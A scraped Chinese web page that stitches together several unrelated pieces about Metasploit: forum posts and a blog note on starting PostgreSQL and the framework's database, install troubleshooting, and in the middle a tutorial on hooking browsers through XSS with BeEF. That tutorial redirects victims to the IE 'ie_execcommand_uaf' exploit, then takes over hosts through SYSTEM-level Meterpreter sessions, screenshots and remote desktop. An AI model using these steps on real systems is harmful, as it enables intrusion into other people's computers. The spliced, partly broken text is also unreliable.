metasploitable问题求助大神

来源:蜘蛛抓取(WebSpider) 时间:2017-07-30 03:26 标签: metasploit framework
查看: 5857|回复: 5
注册时间最后登录阅读权限255积分12精华0帖子
本帖最后由 p@ssion 于
14:48 编辑
看了一圈貌似这个没人发帖,我就发这个吧,也算比较实用。
的数据库是基于postgresql。&&默认kali是安装的但是不启动。
手动启动:&&
#service postgresql start
设置开机自动启动
#update-rc.d postgresql enable
====================================
话虽然少但是很管用,希望admin能通过,谢谢!&&不能通过也给提个醒我发其他的。
如文中未特别声明转载请注明出自:/
注册时间最后登录阅读权限255积分102精华0帖子
/etc/init.d/metasploit start&&这个第一次使用会初始化,建立数据库msf3
必须先启动postgreSQL 再启动metasploit
然后进msf 就连接好了~~
注册时间最后登录阅读权限255积分592精华0帖子
看不懂& && &&&
汗,写错了& &启动是这个
service postgresql start
注册时间最后登录阅读权限255积分132精华0帖子
QQ_B82143 发表于
汗,写错了& &启动是这个
service postgresql start
一样的 。。。。。。。。。。
注册时间最后登录阅读权限255积分38精华0帖子
简单写法:
service postgresql start & service metasploit start
总在线时间大于20小时
Powered bymetasploit利用IE漏洞XSS挂马拿内网主机 -
| 关注黑客与极客
metasploit利用IE漏洞XSS挂马拿内网主机
共340245人围观
,发现 28 个不明物体
metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用。
用到的工具:beEF+msf
&利用的IE漏洞是:
IE&7&on&Windows&XP&SP3
IE&8&on&Windows&XP&SP3
IE&7&on&Windows&Vista
IE&8&on&Windows&Vista
IE&8&on&Windows&7
IE&9&on&Windows&7
用到的beef+msf先配置下:
root@kali:~#&cd&/usr/share/beef-xss/
root@kali:/usr/share/beef-xss#&ls
beef&&&&&&&&&&&beef_key.pem&&config.yaml&&db&&&&&&&&&&Gemfile&&&&&&&modules
beef_cert.pem&&bundle&&&&&&&&core&&&&&&&&&extensions&&Gemfile.lock
编辑下config.yaml把metasploit :false改成true
再进入extensions/metasploit/同样修改下config.yaml把host跟callback_host 改成自己的IP& 这里是220.128
再改动下custom&& path:
这样beef已经配置好了。那就运行下metasploit
运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass
这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。
账号密码beef 配置文件里面有。beef:beef
那beef已经都OK了。现在来搞下选择下要显示的页面:
hook.js& 运行beef 显示出来的。别忘记运行下apache。
我们再进入msf
use&exploit/windows/browser/ie_execcommand_uaf
可以自己根据自己的要求来选择。
show&options
port可以自已改。
我用xp+ie7
直接访问下我们的页面192.168.220.128/xss/beef就会显示出来了。
点击 commands-hookeddomain-REDIRECT BROWSER 让他重新跳转到我们msf生成的地址上。beef很多功能。把地址改成192.168.220.128:8080(msf生成的地址)
我们就会看到msf上面已经显示出来了。 回显了sessionspayload可以自己去改。我使用的meterpreter载荷
执行sessions -i
执行sessions -i ID号可以执行任意命令已经是系统权限
执行下screenshost
meterpreter&&&screenshot&
Screenshot&saved&to:&/root/dlsSQBkF.jpeg
就可以看到当前主机的屏幕内容。
也可以rdesktop 远程连接上去。参数rdesktop &-f ip -u username -p password这也是一种xss挂马拿内网主机。
注:鄙人每天都在写一些metasploit的玩法,如果有大神有什么好的方法希望告诉我,我更新在空间,分享给大家。
必须您当前尚未登录。
必须(保密)
I need AV!
关注我们 分享每日精选文章2272人阅读
metasploit(1)
先启动postgres数据库:
root@firecat:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
root@firecat:~#
再启动metasploit
root@firecat:~# service metasploit star
t最后再启动msfconsole
默认的数据库与密码存放在这里:/opt/metasploit/apps/pro/ui/config/database.yml
如里没有数据库帐号密码, 可以su - postgres切换到postgres用户, 再用下面的命令创建用户与密码:
createuser -P -s -e username
createdb dbname
注意:有时db_statu显示你连接上了, 但查找时, 提示没连接数据库, 这时候可能你要等一会才行,
要不, 就db_rebuild_cache 之后, 等一会就行。
&&相关文章推荐
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:99556次
积分:1151
积分:1151
排名:千里之外
原创:32篇
转载:13篇metasploit 中文系统安装失败问题
windows中文系统在安装metasploit时会报postgresql错误,这是由于postgresql对中文支持问题导致。&&& 解决方法:控制面板-区域和语言选项-将标准与格式,改为英语(美国),在安装即可&&& 或可以安装metasploit framework的mini版,该版本不安装postgresql自然也无上述错误了。但无法使用GUI界面和一些相关功能。
相关报道:
新闻热线:010-
责任编辑:lujq
已有位网友参与评论
名企动态: |
标志着Windows迈出个性化计算的第一步……
&& 本站特聘法律顾问:于国富律师
Copyright (C) 1997-查看: 615|回复: 2
Metasploit Console 问题 无法运行
win8.1 安装-latest-windows-installer.exe
网页 https://localhost:3790/ 注册完
运行Metasploit Console 界面无反应
(90.78 KB, 下载次数: 3)
14:54 上传
(14.3 KB, 下载次数: 5)
14:54 上传
2人 等
过:
他们
求方法 cmd命令啊 或 还需要安装什么 这是好软件 想学习
发表于 7&天前
我当时也遇到l类似这个问题,等一等就出了。
站长推荐 /1
加入VIP,领取Kali论坛定制的首款纪念版T恤,数量有限,领完即止!
免责声明:Kali linux中文网所发布的一切教程文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。
Powered by

我要回帖

更多关于 metasploit framework 的文章

 

随机推荐